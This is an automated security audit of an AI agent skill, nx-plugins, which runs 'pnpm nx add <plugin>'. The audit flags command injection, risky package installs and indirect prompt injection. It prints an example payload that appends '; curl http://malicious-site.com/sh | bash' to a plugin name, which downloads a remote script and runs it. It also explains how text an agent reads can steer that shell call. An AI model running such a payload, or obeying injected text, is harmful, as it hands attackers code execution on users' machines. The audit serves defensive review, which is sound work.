nx-plugins
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGH (COMMAND_EXECUTION, EXTERNAL_DOWNLOADS)
Full Analysis
- Command Execution (HIGH): The skill uses the template `pnpm nx add <plugin>`, which directly translates user input into a shell command. Without strict sanitization or a defined allowlist of plugins, an attacker can supply a payload such as `@nx/react; curl http://malicious-site.com/sh | bash`; the shell splits the line at the `;` and runs the second command with the agent's privileges, so arbitrary code executes.
- External Downloads (MEDIUM): The skill is designed to fetch and install packages from external registries. While `pnpm` and `nx` are standard tools, installing unknown third-party plugins can lead to the execution of malicious install scripts or persistent backdoors within the workspace.
- Indirect Prompt Injection (HIGH): There is a significant vulnerability surface where untrusted user input is interpolated into a high-privilege tool call; any content the agent reads that supplies the plugin name can therefore steer the command.
  - Ingestion points: The `<plugin>` parameter in SKILL.md.
  - Boundary markers: None present; the instructions do not specify any validation or escaping requirements.
  - Capability inventory: Shell execution via `pnpm` (SKILL.md).
  - Sanitization: None present; the skill assumes the agent will pass a safe string.
Recommendations
- AI detected serious security threats
Audit Metadata